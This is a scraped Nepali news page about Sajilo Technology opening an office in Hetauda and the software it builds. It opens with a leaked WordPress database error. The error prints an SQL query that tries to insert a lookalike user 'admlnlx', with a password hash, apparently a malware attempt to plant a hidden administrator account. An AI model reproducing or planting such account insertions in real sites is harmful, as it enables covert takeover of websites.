WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bu3xxrgXfJII.iGaDQkYNTdllqvSi6.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 22:38:11', '', 'admlnlx', 'admlnlx')
हेटौंडा, पुस १२–
सूचना प्रविधीको बढ्दो प्रयोगलाई ध्यानमा दिदै हेटौँडामा सजिलो टेक्नोलोजीले औपचारिक शुरुवात गरेको छ ।
एक वर्षदेखि सञ्चालनमा आएको सूचना तथा प्रबिधी कम्पनीले हेटौँडा–४ स्थित अजरअमर रोडमा कार्यालय सञ्चालनमा ल्याएको हो ।
कम्पनीले वेवसाईट दर्ता तथा निर्माण, सफ्टवयर, मोबाईल एप्लीकेशन निर्माण तथा सम्पादन गरिने सञ्चालक गितानाथ ढुङ्गानाले जानकारी दिनुभयो ।
मोबाईल पसलहरुका लागि कस्टोमर म्यानेजमेन्ट सफ्टवयर, अस्पताल तथा स्वास्थ्य संस्थाका लागि हस्पिटल म्यानेजमेन्ट सफ्टवयर र शैक्षिक तथा ट्युसन सेन्टर म्यानेजमेन्ट सफ्टवयर कम्पनीले तयार गरेर बजारमा ल्याएको छ ।
औपचारिक कार्यालय उद्घाटनका अबसरमा मोबाईल पसलहरुका लागि कस्टोमर म्यानेजमेन्ट सफ्टवयर निःशुल्क रुपमा प्रदान गरिने सञ्चालक ढुङ्गानाले जानकारी दिनुभयो ।
कम्पनीले हेटौँडाबाट सञ्चालित न्यूज वेवसाईटहरु बिकासखबर, खबरब्रेक प्रष्टखबर, हेटौँडाखबर तथा गैरसरकारी संस्था, बिद्यालयहरुको वेवसाईट निर्माण गरिसकेको छ ।